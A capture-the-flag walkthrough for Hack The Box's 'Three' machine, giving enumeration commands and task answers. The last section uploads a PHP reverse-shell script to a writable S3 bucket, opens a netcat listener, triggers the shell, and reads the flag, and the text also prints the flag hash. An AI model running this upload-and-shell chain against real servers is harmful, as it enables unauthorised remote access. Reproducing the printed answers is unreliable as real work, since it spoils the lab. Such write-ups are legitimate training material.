[HTB - Starting Point] Three

Task 1

Q : How many TCP ports are open?

[host] # nmap -sVC -p- --open <target_ip> -oA Three_full_scan

A : 2

Task 2

Q : What is the domain of the email address provided in the “Contact” section of the website?
A : thetoppers.htb

Task 3

Q : In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
A : /etc/hosts

Task 4

Q : Which sub-domain is discovered during further enumeration?

[host] # echo "<target_ip>  thetoppers.htb" >> /etc/hosts
[host] # tgt_size=$(curl -s http://thetoppers.htb | wc -c)
[host] # ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb -H "Host: FUZZ.thetoppers.htb" -fs $tgt_size -mc all

A : s3.thetoppers.htb

Task 5

Q : Which service is running on the discovered sub-domain?
A : amazon s3

Task 6

Q : Which command line utility can be used to interact with the service running on the discovered sub-domain?
A : awscli

Task 7

Q : Which command is used to set up the AWS CLI installation?
A : aws configure

Task 8

Q : What is the command used by the above utility to list all of the S3 buckets?
A : aws s3 ls

Task 9

Q : This server is configured to run files written in what web scripting language?

[host] # aws --endpoint-url=http://s3.thetoppers.htb s3 ls
[host] # aws --endpoint-url=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

A : php

SUBMIT FLAG

Q : Submit root flag

get a php-reverse-shell script.
[host] # aws --endpoint=http://s3.thetoppers.htb s3 cp php-reverse-shell.php s3://thetoppers.htb
[host] # nc -nvlp <listen_port_in_php_reverse_shell>
browse http://<target_ip>/php-reverse-shell.php
(reverse-shell) $ find / -name flag.txt 2>/dev/null
(reverse-shell) $ cat /var/www/flag.txt

A : a980d99281a28d638ac68b9bf9453c2b